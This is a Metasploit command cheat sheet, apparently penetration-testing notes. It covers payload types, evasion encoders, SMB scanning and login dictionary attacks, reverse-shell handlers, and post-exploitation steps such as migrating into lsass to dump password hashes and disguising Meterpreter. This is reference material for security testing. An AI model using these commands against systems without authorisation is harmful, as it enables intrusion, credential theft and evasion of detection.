Modules
- Auxiliary: scanners, crawlers and fuzzers
- Encoders: encode payloads
- Evasion: prepare payloads to circumvent signature-based malware detection
- NOPs: NOP generators for various architectures
- Payloads: code to run on target systems
  - Singles: inline, self-contained payloads, for example generic/shell_reverse_tcp
  - Stagers: small payloads that download the stage payloads
  - Stages: the payloads downloaded by a stager, for example windows/x64/shell/reverse_tcp
- Post: post-exploitation modules
Notes
- Search by module type via
    search type:auxiliary <stuff>
- Send exploit to background
- Check whether the target is vulnerable (without running the exploit) via
    check
- Set a variable globally (applies to all modules) via
    setg
- Unset a single variable via
    unset payload
- Flush all variables via
    unset all
Sessions
- Send the current session to the background via
    background
  or Ctrl+Z
- Bring a session to the foreground via
    sessions -i <number>
Scanning
- UDP sweep via
    scanner/discovery/udp_sweep
- SMB scan via
    scanner/smb/smb_version
  and
    scanner/smb/smb_enumshares
- SMB login dictionary attack via
    scanner/smb/smb_login
- NetBIOS name lookup via
    scanner/netbios/nbname
- HTTP version via
    scanner/http/http_version
Database
- Start PostgreSQL and initialise the database, then check the connection via
    msfdb init
    db_status
- Separate workspace per project via
    workspace -a <projectname>
- Scans whose results are saved to the database via
    db_nmap
- Show discovered hosts via
    hosts
- Show discovered services via
    services
- Set RHOSTS from the stored hosts via
    hosts -R
Exploits
- List the targets and the compatible payloads of the selected module via
    show targets
    show payloads
Reverse Shells
- Multi/handler, set options via
    use exploit/multi/handler
    set payload <payloadhandler>
- Or select a specific exploit module, for example
    use multi/http/apache_mod_cgi_bash_env_exec
Post Exploitation
- Load Meterpreter extensions via
    load kiwi
    load python
- Windows
  - Dump the SAM database via
        migrate <lsass.exe-PID>
        hashdump
  - Enumerate shares via
        post/windows/gather/enum_shares
- Linux
  - Dump password hashes via
        use post/linux/gather/hashdump
Other Meterpreter stuff
- Staged, and can be disguised by running under another service name
- Attempt to elevate privileges
- Use
    multi/handler
  or an exploit, and get an overview of the compatible payloads via
    show payloads
- User ID via
    getuid
Social engineering